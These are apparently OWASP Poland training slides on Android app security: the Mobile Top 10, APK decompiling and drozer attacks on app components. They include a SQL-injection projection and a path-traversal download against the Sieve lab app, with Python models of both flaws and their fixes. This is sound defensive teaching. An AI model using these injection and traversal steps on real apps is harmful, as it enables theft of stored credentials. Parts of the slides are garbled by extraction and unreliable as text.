Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection – mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be enforced again on the server side whenever possible
• Persistent authentication („Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing cryptography in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the APK using dex2jar and review the JAR file in JD-GUI (or Luyten for more verbose results)
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA-1, etc.)
Broken Cryptography - example
• An encrypted DB is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via an intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm://" scheme allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid relying on intent filters for internal communication: even if your Activity has „exported=false", another application can declare the same filter, and when your app sends an implicit Intent the system shows a chooser dialog so the user picks which app handles it (possibly the malicious one)
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed or retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if the session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if the session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire"…
• …but how long should they REALLY last?
• According to one experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  – http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
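The four mitigations above map onto a small server-side session store. The Python class below is an added example (not from the talk): tokens come from the OS CSPRNG via the secrets module, sessions expire after an idle timeout, the token is rotated on authentication-state changes and can be invalidated outright. The injectable clock and FakeClock exist only so the expiry can be demonstrated without waiting thirty minutes.

```python
import secrets
import time


class SessionStore:
    """Server-side session handling: random tokens, idle timeout, rotation on
    authentication-state changes and explicit invalidation."""

    def __init__(self, idle_timeout=30 * 60, clock=time.time):
        self.idle_timeout = idle_timeout
        self.clock = clock
        self._sessions = {}  # token -> {"user": str, "last_seen": float}

    def create(self, user):
        # 256 bits from the OS CSPRNG. Never derive a token from a device ID, IMEI
        # or anything another app on the phone can read: that makes it guessable.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "last_seen": self.clock()}
        return token

    def resolve(self, token):
        """Return the user owning 'token', or None if unknown or idle too long."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        now = self.clock()
        if now - entry["last_seen"] > self.idle_timeout:
            del self._sessions[token]      # expired: destroy it, do not just refuse it
            return None
        entry["last_seen"] = now
        return entry["user"]

    def rotate(self, token):
        """Issue a new token and kill the old one: call this after login, password
        change, privilege change or account switch, so a token captured before
        the change is worthless afterwards."""
        user = self.resolve(token)
        if user is None:
            return None
        del self._sessions[token]
        return self.create(user)

    def invalidate(self, token):
        """Logout: the server forgets the token, whatever the client still holds."""
        self._sessions.pop(token, None)

    def invalidate_user(self, user):
        """Kill every session of one user (e.g. after a password reset)."""
        for tok in [t for t, e in self._sessions.items() if e["user"] == user]:
            del self._sessions[tok]


class FakeClock:
    """Deterministic clock for the demo; production code keeps time.time."""
    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def demo():
    clock = FakeClock()
    store = SessionStore(idle_timeout=30 * 60, clock=clock)
    tok = store.create("alice")
    result = {"fresh_token_resolves": store.resolve(tok) == "alice"}
    new_tok = store.rotate(tok)                     # e.g. right after re-authentication
    result["old_token_dead_after_rotate"] = store.resolve(tok) is None
    result["new_token_alive"] = store.resolve(new_tok) == "alice"
    clock.advance(31 * 60)                          # 31 minutes of inactivity
    result["expired_after_idle"] = store.resolve(new_tok) is None
    tok2 = store.create("alice")
    store.invalidate(tok2)
    result["invalidated_token_dead"] = store.resolve(tok2) is None
    return result


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

Whatever the client does with its copy of the token is irrelevant once the server side has forgotten it; that is the property the first mitigation asks for.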
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code (Smali)
• Why disassembling and not decompiling?
Decompiling
[Diagram: DEX → JAR → Java source]
Decompiling-Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler on the resulting JAR file
Decompiling ndash Java Decompilers
• JD-GUI || Luyten
  – Java decompilers
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but produce different OUTPUT
JD-GUI
Luyten
Disassembling
[Diagram: DEX → Smali]
Disassembling
• Apktool
  – Open source Java tool for reverse engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
bull Using AppUse
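Before decompiling or re-signing, it helps to know what is inside the APK and what a patch to classes.dex has to fix. The following Python script is an added example, not part of the talk or of any of the tools above: it builds a constructed minimal APK (a zip with AndroidManifest.xml, classes.dex, resources.arsc and placeholder META-INF entries), checks the dex header's magic, file_size, adler32 checksum and SHA-1 signature, shows that a raw byte patch breaks both integrity fields, and reseals them the way an smali-to-dex rebuild does. It does not verify the JAR signature; that is what signapk (above) regenerates, and it must be redone after any change to the dex.

```python
import hashlib
import io
import struct
import zipfile
import zlib

DEX_MAGIC = b"dex\n035\0"      # DEX version 035
HEADER_SIZE = 0x70


def seal_dex(dex):
    """Recompute the two integrity fields of a dex header: the SHA-1 'signature'
    over everything after it (offset 32..end) and the adler32 checksum over
    everything after the checksum field (offset 12..end). This is exactly what a
    smali -> dex rebuild has to do after a method has been patched."""
    b = bytearray(dex)
    b[12:32] = hashlib.sha1(bytes(b[32:])).digest()
    struct.pack_into("<I", b, 8, zlib.adler32(bytes(b[12:])) & 0xFFFFFFFF)
    return bytes(b)


def build_dex(payload=b""):
    """Constructed minimal dex: a valid header prefix with the remaining sections
    left empty. Enough for the checksum/signature logic; a VM would reject it
    because it has no map or string tables."""
    b = bytearray(HEADER_SIZE + len(payload))
    b[0:8] = DEX_MAGIC
    struct.pack_into("<I", b, 32, len(b))            # file_size
    struct.pack_into("<I", b, 36, HEADER_SIZE)       # header_size
    struct.pack_into("<I", b, 40, 0x12345678)        # endian_tag (little endian)
    b[HEADER_SIZE:] = payload
    return seal_dex(bytes(b))


def check_dex(dex):
    """Verify magic, file_size, checksum and signature of a classes.dex blob."""
    if len(dex) < HEADER_SIZE or dex[:8] != DEX_MAGIC:
        return {"magic_ok": False}
    checksum, = struct.unpack_from("<I", dex, 8)
    file_size, = struct.unpack_from("<I", dex, 32)
    return {
        "magic_ok": True,
        "size_ok": file_size == len(dex),
        "checksum_ok": checksum == (zlib.adler32(dex[12:]) & 0xFFFFFFFF),
        "signature_ok": dex[12:32] == hashlib.sha1(dex[32:]).digest(),
    }


def build_apk(dex, signed=True):
    """Constructed APK: a zip with the entries a real one carries. The META-INF
    entries are placeholders, not a real JAR signature."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")   # binary-XML header bytes only
        z.writestr("classes.dex", dex)
        z.writestr("resources.arsc", b"")
        if signed:
            z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            z.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
            z.writestr("META-INF/CERT.RSA", b"\x30\x82")
    return buf.getvalue()


def inspect_apk(apk_bytes):
    """What apktool and dex2jar start from: the entry list, whether a v1 (JAR)
    signature block is present, and the integrity state of classes.dex."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        dex = z.read("classes.dex") if "classes.dex" in names else None
    sig_files = [n for n in names
                 if n.startswith("META-INF/") and n.rsplit(".", 1)[-1] in ("RSA", "DSA", "EC")]
    return {"has_manifest": "AndroidManifest.xml" in names,
            "v1_signature_files": sig_files,
            "dex": check_dex(dex) if dex is not None else None}


def tamper(dex, offset=HEADER_SIZE, value=0x41):
    """Patch one byte of the code section without fixing the header, as a naive
    hex edit would."""
    b = bytearray(dex)
    b[offset] = value
    return bytes(b)


if __name__ == "__main__":
    original = build_dex(b"\x00" * 16)
    print("pristine :", check_dex(original))
    print("tampered :", check_dex(tamper(original)))
    print("resealed :", check_dex(seal_dex(tamper(original))))
    print("apk      :", inspect_apk(build_apk(original)))
```

Apktool's rebuild takes care of the dex header for you; what it cannot do is sign, which is why the modified APK is rejected at install time until signapk (or a debug keystore) has produced fresh META-INF entries.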
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something. Users perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.
Activities
Activity components: attacks
• If an activity can be triggered by other apps (i.e. by an attacker), it can be abused.
• By launching it with an intent it is possible to:
  – modify data in the background
  – trick the user
  – leak sensitive information
Activities
Activity components: attacks
• General hijacking scheme
[Diagram: app A sends an implicit intent meant for B; a malicious activity E registers a matching filter and receives it instead]
• Results of an attack:
  – a malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one, so the user notices nothing
  – spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activities
Activity components: attacks
• List and launch exported activities
  dz> run app.activity.info -a com.mwr.example.sieve
  Package: com.mwr.example.sieve
    com.mwr.example.sieve.FileSelectActivity
    com.mwr.example.sieve.MainLoginActivity
    com.mwr.example.sieve.PWList
  dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Starting PWList directly skips the MainLoginActivity login screen: an exported activity cannot rely on another activity having run before it.
Activity components: demo
Services
A Service performs long-running operations in the background and provides no user interface. Other components can bind to a Service, which lets the binder invoke methods declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file.
Services
Services: attacks
Although they generally don't seem dangerous, services can perform sensitive operations.
To attack a service you need a way to interact with it: it must be exported, or it must accept input from another channel such as intents, files or the network stack.
Services
Services: attacks
Typical attacks: denial of service and information leakage.
• Find exported services
• Start them one by one with logcat running and check the output for sensitive info
• Fire off intents (including ones with missing or malformed extras) and watch how the service reacts: a crash is a DoS, and the stack trace in logcat may leak data
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: through a content provider any app holding the READ_SMS permission can read SMS from the built-in SMS app's repository on the device.
Content providers
• What info can they hold?
  – user's phone numbers
  – passwords
  – SMS
• And one of the main problems is, again, permissions:
  run app.provider.info --permission null
(lists exported providers that require no permission at all)
Content providers: attacks
• Unrestricted access to the app database – just query it:
  run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors might include altering data, e.g. using the app.provider.insert (or update/delete) command.
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers: attacks
• Unrestricted access to the app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys/
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers: attacks
• SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  unrecognized token: ')' (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
The error message gives away the statement being built: the selection string is pasted straight into the WHERE clause. The projection is pasted in the same way, so a projection that closes the statement and comments out the rest reads a different table through the same URI:
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
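The mechanism behind those two drozer commands, as an added example in Python (this is not Sieve's Java code; it mimics what a provider does when it forwards the caller's projection and selection into the SQL text, and the table layouts and rows are constructed here). `vulnerable_query` reproduces the leak, `hardened_query` shows the fix: an allow-list for column names and bound parameters for values.

```python
"""Content-provider SQL injection modelled with sqlite3 (added example, constructed data)."""
import sqlite3


def make_db():
    """Two tables shaped like Sieve's: Passwords (served by the URI) and Key (not meant to be)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT, username TEXT,
                               password BLOB, email TEXT);
        CREATE TABLE Key(Password TEXT, pin TEXT);
        INSERT INTO Passwords(service, username, password, email)
            VALUES ('Gmail', 'alice', X'DEADBEEF', 'alice@example.com');
        INSERT INTO Key VALUES ('thisismypassword', '9876');
    """)
    return db


def vulnerable_query(db, table, projection=None, selection=None, selection_args=()):
    """The pattern behind the drozer output: projection and selection are string-pasted."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM %s" % (cols, table)
    if selection:
        sql += " WHERE (%s)" % selection      # caller-controlled text lands inside the statement
    return db.execute(sql, selection_args).fetchall()


ALLOWED_COLUMNS = {"Passwords": ("_id", "service", "username", "password", "email")}


def hardened_query(db, table, projection=None, filters=None):
    """Projection checked against an allow-list; filter values bound as parameters, never pasted."""
    allowed = ALLOWED_COLUMNS[table]
    cols = list(projection) if projection else list(allowed)
    bad = [c for c in cols if c not in allowed]
    if bad:
        raise ValueError("unknown column(s): %r" % bad)
    sql = "SELECT %s FROM %s" % (", ".join(cols), table)
    args = []
    if filters:
        if any(k not in allowed for k in filters):
            raise ValueError("unknown filter column")
        sql += " WHERE " + " AND ".join("%s = ?" % k for k in filters)
        args = list(filters.values())
    return db.execute(sql, args).fetchall()


def probe_for_injection(db):
    """drozer --selection "'" : the provider echoes the SQLite syntax error back to the caller."""
    try:
        vulnerable_query(db, "Passwords", selection="'")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


def dump_other_table(db):
    """drozer --projection "* FROM Key--" : the rest of the statement is commented out."""
    return vulnerable_query(db, "Passwords", projection=["* FROM Key--"])


if __name__ == "__main__":
    db = make_db()
    print("error leaked:", probe_for_injection(db))
    print("Key table via Passwords URI:", dump_other_table(db))
    print("hardened:", hardened_query(db, "Passwords", ["service", "username"], {"service": "Gmail"}))
```

On Android the equivalent of the hardened version is a projection map (SQLiteQueryBuilder.setProjectionMap) plus setStrict(true), and passing user values only through selectionArgs.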
Content providers: attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
The provider opens whatever path follows its authority, so any file the app's UID can read, its own private database included, can be pulled out by another app.
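The same bug and its fix as an added Python example (a stand-in for ContentProvider.openFile(), not Sieve's code; the directory layout is constructed in a temporary folder so it runs offline). Note the two ways the vulnerable version loses the sandbox: os.path.join() discards the base directory when the requested path is absolute, and "../" is never checked.

```python
"""File-backed content provider: path traversal and the realpath check that stops it."""
import os
import tempfile


class FileBackupProvider:
    def __init__(self, base_dir):
        self.base = os.path.realpath(base_dir)

    def open_file_vulnerable(self, uri_path):
        # The URI path is joined to the backup directory and used as-is.
        # join() returns uri_path unchanged when it is absolute ("/etc/hosts"), and
        # "../" segments are never checked, so any readable file can be requested.
        with open(os.path.join(self.base, uri_path), "rb") as f:
            return f.read()

    def open_file_hardened(self, uri_path):
        # Drop the leading "/", resolve ".." and symlinks, then confirm the result
        # still lies below the backup directory before opening it.
        candidate = os.path.realpath(os.path.join(self.base, uri_path.lstrip("/")))
        if os.path.commonpath([candidate, self.base]) != self.base:
            raise PermissionError("path escapes %s: %r" % (self.base, uri_path))
        with open(candidate, "rb") as f:
            return f.read()


def build_fixture():
    """Constructed layout: <tmp>/backup/public.txt is meant to be served,
    <tmp>/private/database.db stands in for the app's own database."""
    root = tempfile.mkdtemp(prefix="sieve-")
    os.makedirs(os.path.join(root, "backup"))
    os.makedirs(os.path.join(root, "private"))
    with open(os.path.join(root, "backup", "public.txt"), "wb") as f:
        f.write(b"exported backup")
    secret = os.path.join(root, "private", "database.db")
    with open(secret, "wb") as f:
        f.write(b"SQLite format 3\x00 ...passwords...")
    return FileBackupProvider(os.path.join(root, "backup")), secret


def traversal_results():
    """Send the requests drozer would send against both implementations."""
    provider, secret = build_fixture()
    results = {
        "vuln_absolute": provider.open_file_vulnerable(secret),
        "vuln_dotdot": provider.open_file_vulnerable("../private/database.db"),
        "hard_public": provider.open_file_hardened("/public.txt"),
        "hard_blocked": 0,
    }
    for path in (secret, "../private/database.db"):
        try:
            provider.open_file_hardened(path)
            results["hard_" + path] = "NOT BLOCKED"
        except (PermissionError, FileNotFoundError):
            # absolute paths are re-rooted under base (and then do not exist),
            # ".." escapes are rejected by the commonpath check
            results["hard_blocked"] += 1
    return results


if __name__ == "__main__":
    for key, value in traversal_results().items():
        print(key, value)
```

The Java equivalent is File.getCanonicalPath() on the joined path followed by a startsWith() check against the canonical base directory; checking the raw string for ".." is not enough because of symlinks and URL-encoded separators.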
Content providers: demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged in", etc. Although most broadcasts originate from the system, applications can also send broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers: attacks
Typical fail: missing authorization.
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy
Broadcast receivers: attacks
Sample manifest from GoatDroid:
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
The intent filter makes the receiver exported by default and no android:permission is set on it, so any app on the device can trigger it, while the app itself holds SEND_SMS.
Broadcast receivers: attacks
